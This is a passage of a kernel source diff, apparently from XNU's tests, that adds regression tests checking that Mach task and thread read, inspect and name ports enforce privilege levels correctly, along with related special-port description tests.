 static void run_test(int fault_type, int mapping_variant, size_t memsize);
 static void setup_and_run_test(int test, int threads);
-static int get_ncpu(void);
 
 /* Allocates memory using the default mmap behavior. Each VM region created is capped at 128 MB. */
 static void
@@ -410,17 +411,6 @@ setup_and_run_test(int fault_type, int threads)
        T_END;
 }
 
-static int
-get_ncpu(void)
-{
-       int ncpu;
-       size_t length = sizeof(ncpu);
-
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0),
-           "failed to query hw.ncpu");
-       return ncpu;
-}
-
 T_DECL(read_soft_fault,
     "Read soft faults (single thread)")
 {
index 55d3c12b1199037d4dc7b39e27f1d0153b33dca7..64bbab2711ad518e900c6ff96e184175cdc899e1 100644 (file)
@@ -76,10 +76,11 @@ T_DECL(host_special_port_descriptions,
        TEST_HSP(HOST_SYSPOLICYD_PORT);
        TEST_HSP(HOST_FILECOORDINATIOND_PORT);
        TEST_HSP(HOST_FAIRPLAYD_PORT);
+       TEST_HSP(HOST_IOCOMPRESSIONSTATS_PORT);
 
 #undef TEST_HSP
 
-       T_EXPECT_EQ(HOST_FAIRPLAYD_PORT, HOST_MAX_SPECIAL_PORT,
+       T_EXPECT_EQ(HOST_IOCOMPRESSIONSTATS_PORT, HOST_MAX_SPECIAL_PORT,
            "checked all of the ports");
 
        const char *invalid_hsp =
@@ -96,6 +97,8 @@ T_DECL(task_special_port_descriptions,
                portdef, #portdef)
 
        TEST_TSP(TASK_KERNEL_PORT);
+       TEST_TSP(TASK_READ_PORT);
+       TEST_TSP(TASK_INSPECT_PORT);
        TEST_TSP(TASK_HOST_PORT);
        TEST_TSP(TASK_NAME_PORT);
        TEST_TSP(TASK_BOOTSTRAP_PORT);
@@ -115,6 +118,28 @@ T_DECL(task_special_port_descriptions,
            "invalid task special port description should be NULL");
 }
 
+T_DECL(thread_special_port_descriptions,
+    "verify that thread special ports can be described")
+{
+#define TEST_TSP(portdef) \
+               expect_special_port_description(mach_thread_special_port_description, \
+               portdef, #portdef)
+
+       TEST_TSP(THREAD_KERNEL_PORT);
+       TEST_TSP(THREAD_READ_PORT);
+       TEST_TSP(THREAD_INSPECT_PORT);
+
+#undef TEST_TSP
+
+       T_EXPECT_EQ(THREAD_READ_PORT, THREAD_MAX_SPECIAL_PORT,
+           "checked all of the ports");
+
+       const char *invalid_tsp =
+           mach_thread_special_port_description(THREAD_MAX_SPECIAL_PORT + 1);
+       T_EXPECT_NULL(invalid_tsp,
+           "invalid thread special port description should be NULL");
+}
+
 static void
 expect_special_port_id(int (*fn)(const char *id), int port, const char *portid)
 {
@@ -172,6 +197,8 @@ T_DECL(task_special_port_mapping,
                portdef, #portdef)
 
        TEST_TSP(TASK_KERNEL_PORT);
+       TEST_TSP(TASK_READ_PORT);
+       TEST_TSP(TASK_INSPECT_PORT);
        TEST_TSP(TASK_HOST_PORT);
        TEST_TSP(TASK_NAME_PORT);
        TEST_TSP(TASK_BOOTSTRAP_PORT);
@@ -186,3 +213,21 @@ T_DECL(task_special_port_mapping,
        T_EXPECT_EQ(invalid_tsp, -1,
            "invalid task special port IDs should return -1");
 }
+
+T_DECL(thread_special_port_mapping,
+    "verify that thread special port names can be mapped to numbers")
+{
+#define TEST_TSP(portdef) \
+               expect_special_port_id(mach_thread_special_port_for_id, \
+               portdef, #portdef)
+
+       TEST_TSP(THREAD_KERNEL_PORT);
+       TEST_TSP(THREAD_READ_PORT);
+       TEST_TSP(THREAD_INSPECT_PORT);
+
+#undef TEST_TSP
+
+       int invalid_tsp = mach_thread_special_port_for_id("BOGUS_SPECIAL_PORT_NAME");
+       T_EXPECT_EQ(invalid_tsp, -1,
+           "invalid thread special port IDs should return -1");
+}
index e8615016cca4a233b31d1bbe39fecf3f558b7885..9b1b26141b6513170dd88678ffdcf817b56feff7 100644 (file)
@@ -4,6 +4,8 @@
 #include <string.h>
 #include <errno.h>
 
+#include "test_utils.h"
+
 /*
  * Any change to this structure must be reflected in iBoot / MacEFI / PanicDump / XNU Tests and vice versa.
  */
@@ -39,21 +41,6 @@ check_for_substrings(const char* string, size_t len)
        return res;
 }
 
-static boolean_t
-is_development_kernel(void)
-{
-       int ret;
-       int dev = 0;
-       size_t dev_size = sizeof(dev);
-
-       ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0);
-       if (ret != 0) {
-               return FALSE;
-       }
-
-       return dev != 0;
-}
-
 /*
  *       Valid cases:
  *       1. Development & Debug iBoot/macEFI provides a preoslog buffer.
index d864d85319665ef4cad611bee8fe680869fb030d..18f54d76d3dd15b441d630cb63a7970342bed75c 100644 (file)
@@ -68,9 +68,9 @@ T_DECL(test_quiescent_counter, "Validate that _COMM_PAGE_CPU_QUIESCENT_COUNTER i
 
        T_ASSERT_GT(cpu_checkin_min_interval, 0, "kern.cpu_checkin_interval should be > 0");
 
-       uint64_t* commpage_addr = (uint64_t *)(uintptr_t)_COMM_PAGE_CPU_QUIESCENT_COUNTER;
+       COMM_PAGE_SLOT_TYPE(uint64_t) commpage_addr = COMM_PAGE_SLOT(uint64_t, CPU_QUIESCENT_COUNTER);
 
-       T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", (void*) commpage_addr);
+       T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", commpage_addr);
 
        uint64_t counter = *commpage_addr;
        uint64_t last_counter = counter;
diff --git a/tests/read_inspect.c b/tests/read_inspect.c
new file mode 100644 (file)
index 0000000..82b3751
--- /dev/null
@@ -0,0 +1,630 @@
+#include <darwintest.h>
+
+#include <mach/host_priv.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/mach_vm.h>
+#include <mach_debug/ipc_info.h>
+#include <mach/processor_set.h>
+#include <mach/task.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/proc.h>
+#include <sys/sysctl.h>
+#include <unistd.h>
+#include <TargetConditionals.h>
+
+#define IKOT_THREAD_CONTROL             1
+#define IKOT_THREAD_READ                47
+#define IKOT_THREAD_INSPECT             46
+
+#define IKOT_TASK_CONTROL               2
+#define IKOT_TASK_READ                  45
+#define IKOT_TASK_INSPECT               44
+#define IKOT_TASK_NAME                  20
+
+
+/*
+ * This test verifies various security properties for task and thread
+ * read/inspect interfaces. Specifically, it checks and makes sure:
+ *
+ * 1. Task/thread can't get higher priv'ed ports from lower ones through
+ * {task, thread}_get_special_port()
+ * 2. Correct level of thread ports are returned from task_threads() with
+ * a given task port flavor
+ * 3. Correct level of task ports are returned from processor_set_tasks()
+ * 4. MIG intrans conversion and enforcement for task/thread port does not break.
+ * 5. task_{, read, inspect, name}_for_pid() works for self and other process
+ * 6. The new mach_vm_remap_new interface behaves correctly
+ */
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+static void
+RESULT_CHECK(
+       kern_return_t kr,
+       unsigned int flavor,  /* task_flavor_t or thread_flavor_t */
+       unsigned int required, /* task_flavor_t or thread_flavor_t */
+       char *f_name)
+{
+       if (flavor <= required) {
+               T_EXPECT_EQ(kr, KERN_SUCCESS, "%s should succeed with task/thread flavor %d, kr: 0x%x", f_name, flavor, kr);
+       } else {
+               T_EXPECT_NE(kr, KERN_SUCCESS, "%s should fail with task/thread flavor %d, kr: 0x%x", f_name, flavor, kr);
+       }
+}
+
+static void
+test_task_get_special_port(
+       task_t  tport,
+       task_flavor_t flavor)
+{
+       kern_return_t kr;
+       mach_port_t special_port = MACH_PORT_NULL;
+       mach_port_t tfp_port = MACH_PORT_NULL;
+
+       T_LOG("Testing task_get_special_port() with task flavor %d", flavor);
+       /* gettable with at least control port */
+       kr = task_get_special_port(tport, TASK_KERNEL_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_KERNEL_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       kr = task_get_special_port(tport, TASK_BOOTSTRAP_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_BOOTSTRAP_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       kr = task_get_special_port(tport, TASK_HOST_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_HOST_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least read port */
+       kr = task_get_special_port(tport, TASK_READ_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_special_port(TASK_READ_PORT)");
+       if (KERN_SUCCESS == kr) {
+               kr = task_read_for_pid(mach_task_self(), getpid(), &tfp_port);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()");
+               T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_read_for_pid() should match TASK_READ_PORT");
+               mach_port_deallocate(mach_task_self(), tfp_port);
+       }
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least inspect port */
+       kr = task_get_special_port(tport, TASK_INSPECT_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_INSPECT_PORT)");
+       if (KERN_SUCCESS == kr) {
+               kr = task_inspect_for_pid(mach_task_self(), getpid(), &tfp_port);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()");
+               T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_inspect_for_pid() should match TASK_INSPECT_PORT");
+               mach_port_deallocate(mach_task_self(), tfp_port);
+       }
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least name port */
+       kr = task_get_special_port(tport, TASK_NAME_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_NAME_PORT)");
+       if (KERN_SUCCESS == kr) {
+               kr = task_name_for_pid(mach_task_self(), getpid(), &tfp_port);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()");
+               T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_name_for_pid() should match TASK_NAME_PORT");
+               mach_port_deallocate(mach_task_self(), tfp_port);
+       }
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+}
+
+static void
+test_thread_get_special_port(
+       thread_t  tport,
+       thread_flavor_t flavor)
+{
+       kern_return_t kr;
+       mach_port_t special_port = MACH_PORT_NULL;
+
+       T_LOG("Testing thread_get_special_port() with thread flavor %d", flavor);
+       /* gettable with at least control port */
+       kr = thread_get_special_port(tport, THREAD_KERNEL_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_special_port(THREAD_KERNEL_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least read port */
+       kr = thread_get_special_port(tport, THREAD_READ_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_special_port(THREAD_READ_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least inspect port */
+       kr = thread_get_special_port(tport, THREAD_INSPECT_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_special_port(THREAD_INSPECT_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+}
+
+static void
+test_task_threads(
+       task_t  tport,
+       task_flavor_t flavor)
+{
+       kern_return_t kr;
+       thread_array_t threadList;
+       mach_msg_type_number_t threadCount = 0;
+
+       unsigned int kotype;
+       unsigned int kaddr;
+
+       T_LOG("Testing task_threads() with task flavor %d", flavor);
+
+       kr = task_threads(tport, &threadList, &threadCount);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_threads");
+
+       if (kr) {
+               T_LOG("task_threads failed, skipping test_task_threads()");
+               return;
+       }
+
+       T_QUIET; T_ASSERT_GE(threadCount, 1, "threadCount should be at least 1");
+
+       /*
+        * TASK_FLAVOR_CONTROL -> THREAD_FLAVOR_CONTROL
+        * TASK_FLAVOR_READ    -> THREAD_FLAVOR_READ
+        * TASK_FLAVOR_INSPECT -> THREAD_FLAVOR_INSPECT
+        * TASK_FLAOVR_NAME    -> KERN_FAILURE
+        */
+       for (size_t i = 0; i < threadCount; i++) {
+               kr = mach_port_kernel_object(mach_task_self(), threadList[i], &kotype, &kaddr);
+               if (kr == KERN_INVALID_RIGHT) {
+                       /* thread port is inactive */
+                       T_LOG("thread port name 0x%x is inactive", threadList[i]);
+                       continue;
+               } else if (kr) {
+                       T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr);
+               }
+               switch (flavor) {
+               case TASK_FLAVOR_CONTROL:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_CONTROL, "Task control port should yield thread control port");
+                       break;
+               case TASK_FLAVOR_READ:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_READ, "Task read port should yield thread read port");
+                       break;
+               case TASK_FLAVOR_INSPECT:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_INSPECT, "Task inspect port should yield thread inspect port");
+                       break;
+               default:
+                       T_FAIL("task_threads() returned thread ports with task name port??");
+                       break;
+               }
+       }
+
+       for (size_t i = 0; i < threadCount; i++) {
+               mach_port_deallocate(mach_task_self(), threadList[i]);
+       }
+}
+
+static void
+test_processor_set_tasks(
+       task_flavor_t flavor)
+{
+       kern_return_t kr;
+       processor_set_name_array_t psets;
+       processor_set_t        pset_priv;
+       task_array_t taskList;
+       mach_msg_type_number_t pcnt = 0, tcnt = 0;
+       mach_port_t host = mach_host_self();
+
+       unsigned int kotype;
+       unsigned int kaddr;
+
+       T_LOG("Testing processor_set_tasks() with task flavor %d", flavor);
+
+       kr = host_processor_sets(host, &psets, &pcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets");
+       T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set");
+
+       kr = host_processor_set_priv(host, psets[0], &pset_priv);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv");
+       for (size_t i = 0; i < pcnt; i++) {
+               mach_port_deallocate(mach_task_self(), psets[i]);
+       }
+       mach_port_deallocate(mach_task_self(), host);
+
+       kr = processor_set_tasks_with_flavor(pset_priv, flavor, &taskList, &tcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor");
+       T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task");
+       mach_port_deallocate(mach_task_self(), pset_priv);
+
+       for (size_t i = 0; i < tcnt; i++) {
+               kr = mach_port_kernel_object(mach_task_self(), taskList[i], &kotype, &kaddr);
+               if (kr == KERN_INVALID_RIGHT) {
+                       /* task port is inactive */
+                       T_LOG("task port name 0x%x is inactive", taskList[i]);
+                       continue;
+               } else if (kr) {
+                       T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr);
+               }
+               switch (flavor) {
+               case TASK_FLAVOR_CONTROL:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_CONTROL, "TASK_FLAVOR_CONTROL should yield control ports");
+                       break;
+               case TASK_FLAVOR_READ:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_READ, "TASK_FLAVOR_READ should yield read ports");
+                       break;
+               case TASK_FLAVOR_INSPECT:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_INSPECT, "TASK_FLAVOR_INSPECT should yield inspect ports");
+                       break;
+               case TASK_FLAVOR_NAME:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_NAME, "TASK_FLAVOR_NAME should yield name ports");
+                       break;
+               default:
+                       T_FAIL("strange flavor");
+                       break;
+               }
+       }
+
+       for (size_t i = 0; i < tcnt; i++) {
+               mach_port_deallocate(mach_task_self(), taskList[i]);
+       }
+}
+
+static void
+test_task_port_mig_intrans(
+       task_t  tport,
+       task_flavor_t   flavor)
+{
+       kern_return_t kr;
+
+       T_LOG("Testing various MIG/manual intrans task interfaces with task flavor %d", flavor);
+
+       {
+               /* 1. Test some control port interfaces */
+               int data = 0x41;
+               int new_value = 0x42;
+               kr = mach_vm_write(tport,
+                   (mach_vm_address_t)&data,
+                   (vm_offset_t)&new_value,
+                   (mach_msg_type_number_t)sizeof(int));
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_write");
+
+               /* mach_vm_remap_new with max_protection VM_PROT_WRITE | VM_PROT_READ */
+               int *localAddress = 0;
+               mach_vm_address_t localMachVMAddress = 0;
+               vm_prot_t cur_protection = VM_PROT_WRITE | VM_PROT_READ;
+               vm_prot_t max_protection = VM_PROT_WRITE | VM_PROT_READ;
+               /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */
+               kr = mach_vm_remap_new(mach_task_self(),
+                   &localMachVMAddress,
+                   sizeof(int),
+                   0,
+                   VM_FLAGS_ANYWHERE,
+                   tport, /* remote task, use self task port */
+                   (mach_vm_address_t)&data,
+                   false,
+                   &cur_protection,
+                   &max_protection,
+                   VM_INHERIT_NONE);
+               localAddress = (int *)(uintptr_t)localMachVMAddress;
+
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_remap_new - VM_PROT_WRITE");
+               if (KERN_SUCCESS == kr) {
+                       T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */
+                       *localAddress = 0; /* write */
+               }
+
+               exception_mask_t masks[EXC_TYPES_COUNT] = {};
+               mach_msg_type_number_t nmasks = 0;
+               exception_port_t ports[EXC_TYPES_COUNT] = {};
+               exception_behavior_t behaviors[EXC_TYPES_COUNT] = {};
+               thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {};
+               kr = task_get_exception_ports(tport, EXC_MASK_ALL,
+                   masks, &nmasks, ports, behaviors, flavors);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_exception_ports");
+               for (size_t i = 0; i < EXC_TYPES_COUNT; i++) {
+                       mach_port_deallocate(mach_task_self(), ports[i]);
+               }
+       }
+
+       {
+               /* 2. Test some read port interfaces */
+               vm_offset_t read_value = 0;
+               mach_msg_type_number_t read_cnt = 0;
+               int data = 0x41;
+               kr = mach_vm_read(tport,
+                   (mach_vm_address_t)&data,
+                   (mach_msg_type_number_t)sizeof(int),
+                   &read_value,
+                   &read_cnt);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_read");
+
+               /* mach_vm_remap_new with max_protection VM_PROT_READ */
+               int *localAddress = 0;
+               mach_vm_address_t localMachVMAddress = 0;
+               vm_prot_t cur_protection = VM_PROT_READ;
+               vm_prot_t max_protection = VM_PROT_READ;
+               /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */
+               kr = mach_vm_remap_new(mach_task_self(),
+                   &localMachVMAddress,
+                   sizeof(int),
+                   0,
+                   VM_FLAGS_ANYWHERE,
+                   tport, /* remote task, use self task port */
+                   (mach_vm_address_t)&data,
+                   false,
+                   &cur_protection,
+                   &max_protection,
+                   VM_INHERIT_NONE);
+               localAddress = (int *)(uintptr_t)localMachVMAddress;
+
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - VM_PROT_READ");
+               if (KERN_SUCCESS == kr) {
+                       T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ, NULL);
+                       T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ, NULL);
+                       T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */
+               }
+
+               /* mach_vm_remap_new with copy == TRUE */
+               int data2 = 0x42;
+               localAddress = 0;
+               localMachVMAddress = 0;
+               cur_protection = VM_PROT_WRITE | VM_PROT_READ;
+               max_protection = VM_PROT_WRITE | VM_PROT_READ;
+
+               kr = mach_vm_remap_new(mach_task_self(),
+                   &localMachVMAddress,
+                   sizeof(int),
+                   0,
+                   VM_FLAGS_ANYWHERE,
+                   tport, /* remote task, use self task port */
+                   (mach_vm_address_t)&data2,
+                   true,
+                   &cur_protection,
+                   &max_protection,
+                   VM_INHERIT_NONE);
+               localAddress = (int *)(uintptr_t)localMachVMAddress;
+
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - copy==TRUE");
+               if (KERN_SUCCESS == kr) {
+                       T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       /* Following is causing bus error tracked by rdar://71616700 (Unexpected BUS ERROR in mach_vm_remap_new()) */
+                       // T_QUIET; T_EXPECT_EQ(*localAddress, data2, NULL); /* read */
+                       // *localAddress = 0; /* write */
+               }
+
+               /* */
+               mach_port_t voucher = MACH_PORT_NULL;
+               kr = task_get_mach_voucher(tport, 0, &voucher);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_mach_voucher");
+               mach_port_deallocate(mach_task_self(), voucher);
+
+               /* */
+               ipc_info_space_t space_info;
+               ipc_info_name_array_t table;
+               mach_msg_type_number_t tableCount;
+               ipc_info_tree_name_array_t tree; /* unused */
+               mach_msg_type_number_t treeCount; /* unused */
+               kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_port_space_info");
+       }
+
+       {
+               /* 3. Test some inspect port interfaces */
+               task_exc_guard_behavior_t exc_behavior;
+               kr = task_get_exc_guard_behavior(tport, &exc_behavior);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_exc_guard_behavior");
+       }
+
+       {
+               /* 4. Test some name port interfaces */
+               struct task_basic_info info;
+               mach_msg_type_number_t size = sizeof(info);
+               kr = task_info(tport,
+                   TASK_BASIC_INFO,
+                   (task_info_t)&info,
+                   &size);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_NAME, "task_info");
+       }
+}
+
+static void
+test_thread_port_mig_intrans(
+       thread_t  tport,
+       thread_flavor_t   flavor)
+{
+       kern_return_t kr;
+
+       T_LOG("Testing various MIG/manual intrans thread interfaces with thread flavor %d", flavor);
+
+       {
+               /* 1. Test some control port interfaces */
+               exception_mask_t masks[EXC_TYPES_COUNT] = {};
+               mach_msg_type_number_t nmasks = 0;
+               exception_port_t ports[EXC_TYPES_COUNT] = {};
+               exception_behavior_t behaviors[EXC_TYPES_COUNT] = {};;
+               thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {};;
+               kr = thread_get_exception_ports(tport, EXC_MASK_ALL,
+                   masks, &nmasks, ports, behaviors, flavors);
+               RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_exception_ports");
+               for (size_t i = 0; i < EXC_TYPES_COUNT; i++) {
+                       mach_port_deallocate(mach_task_self(), ports[i]);
+               }
+       }
+
+       {
+               /* 2. Test some read port interfaces */
+               mach_voucher_t voucher = MACH_PORT_NULL;
+               kr = thread_get_mach_voucher(tport, 0, &voucher);
+               RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_mach_voucher");
+               mach_port_deallocate(mach_task_self(), voucher);
+       }
+
+       {
+               /* 3. Test some inspect port interfaces */
+               processor_set_name_t name = MACH_PORT_NULL;
+               kr = thread_get_assignment(tport, &name);
+               RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_assignment");
+               mach_port_deallocate(mach_task_self(), name);
+       }
+}
+
+static void
+test_get_child_task_port(void)
+{
+       pid_t child_pid;
+       kern_return_t kr;
+       mach_port_name_t tr, ti, tp, tn;
+
+       child_pid = fork();
+
+       T_LOG("Testing get child task ports");
+
+       if (child_pid < 0) {
+               T_FAIL("fork failed in test_get_child_port.");
+       }
+
+       if (child_pid == 0) {
+               /* hang the child */
+               while (1) {
+                       sleep(10);
+               }
+       }
+
+       kr = task_for_pid(mach_task_self(), child_pid, &tp);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid);
+
+       kr = task_read_for_pid(mach_task_self(), child_pid, &tr);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid);
+
+       kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid);
+
+       kr = task_name_for_pid(mach_task_self(), child_pid, &tn);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid);
+
+       mach_port_deallocate(mach_task_self(), tp);
+       mach_port_deallocate(mach_task_self(), tr);
+       mach_port_deallocate(mach_task_self(), ti);
+       mach_port_deallocate(mach_task_self(), tn);
+
+       kill(child_pid, SIGKILL);
+       int status;
+       wait(&status);
+}
+
+T_DECL(read_inspect, "Test critical read and inspect port interfaces")
+{
+       mach_port_t control_port, movable_port, read_port, inspect_port, name_port;
+       mach_port_t th_control_port, th_movable_port, th_read_port, th_inspect_port;
+#define TASK_PORT_COUNT 5
+#define THREAD_PORT_COUNT 4
+       mach_port_t task_ports[TASK_PORT_COUNT];
+       task_flavor_t task_flavors[TASK_PORT_COUNT];
+       mach_port_t thread_ports[THREAD_PORT_COUNT];
+       thread_flavor_t thread_flavors[THREAD_PORT_COUNT];
+       kern_return_t kr;
+
+       /* first, try getting all flavors of task port for self */
+       kr = task_for_pid(mach_task_self(), getpid(), &control_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()");
+       task_ports[0] = control_port;
+       task_flavors[0] = TASK_FLAVOR_CONTROL;
+
+       kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &movable_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port(..TASK_KERNEL_PORT..)");
+       task_ports[1] = movable_port;
+       task_flavors[1] = TASK_FLAVOR_CONTROL;
+
+       kr = task_read_for_pid(mach_task_self(), getpid(), &read_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()");
+       task_ports[2] = read_port;
+       task_flavors[2] = TASK_FLAVOR_READ;
+
+       kr = task_inspect_for_pid(mach_task_self(), getpid(), &inspect_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()");
+       task_ports[3] = inspect_port;
+       task_flavors[3] = TASK_FLAVOR_INSPECT;
+
+       kr = task_name_for_pid(mach_task_self(), getpid(), &name_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()");
+       task_ports[4] = name_port;
+       task_flavors[4] = TASK_FLAVOR_NAME;
+
+
+       for (size_t i = 0; i < TASK_PORT_COUNT; i++) {
+               /*
+                * 1. Make sure can't get higher priv'ed ports from lower ones through
+                * task_get_special_port()
+                */
+               test_task_get_special_port(task_ports[i], task_flavors[i]);
+
+               /*
+                * 2. Make sure correct level of thread ports are returned from task_threads
+                */
+               test_task_threads(task_ports[i], task_flavors[i]);
+
+               /*
+                * 3. Make sure correct level of task ports are returned from processor_set_tasks
+                */
+               if (i >= 1) {
+                       test_processor_set_tasks(task_flavors[i]);
+               }
+
+               /*
+                * 4. Make sure our MIG intrans enforcement for tasks does not break.
+                */
+               test_task_port_mig_intrans(task_ports[i], task_flavors[i]);
+       }
+
+
+       for (size_t i = 0; i < TASK_PORT_COUNT; i++) {
+               mach_port_deallocate(mach_task_self(), task_ports[i]);
+       }
+
+       /* 4. Try spawning a child an get its task ports */
+       test_get_child_task_port();
+
+       /* Now, test thread read/inspect ports */
+       th_control_port = mach_thread_self();
+       thread_ports[0] = th_control_port;
+       thread_flavors[0] = THREAD_FLAVOR_CONTROL;
+
+       kr = thread_get_special_port(th_control_port, THREAD_KERNEL_PORT, &th_movable_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_KERNEL_PORT..)");
+       thread_ports[1] = th_movable_port;
+       thread_flavors[1] = THREAD_FLAVOR_CONTROL;
+
+       kr = thread_get_special_port(th_control_port, THREAD_READ_PORT, &th_read_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_READ_PORT..)");
+       thread_ports[2] = th_read_port;
+       thread_flavors[2] = THREAD_FLAVOR_READ;
+
+       kr = thread_get_special_port(th_control_port, THREAD_INSPECT_PORT, &th_inspect_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_INSPECT_PORT..)");
+       thread_ports[3] = th_inspect_port;
+       thread_flavors[3] = THREAD_FLAVOR_INSPECT;
+
+
+       for (size_t i = 0; i < THREAD_PORT_COUNT; i++) {
+               /*
+                * 1. Make sure can't get higher priv'ed ports from lower ones through
+                * thread_get_special_port()
+                */
+               test_thread_get_special_port(thread_ports[i], thread_flavors[i]);
+
+               /*
+                * 2. Make sure our MIG intrans enforcement for threads does not break.
+                */
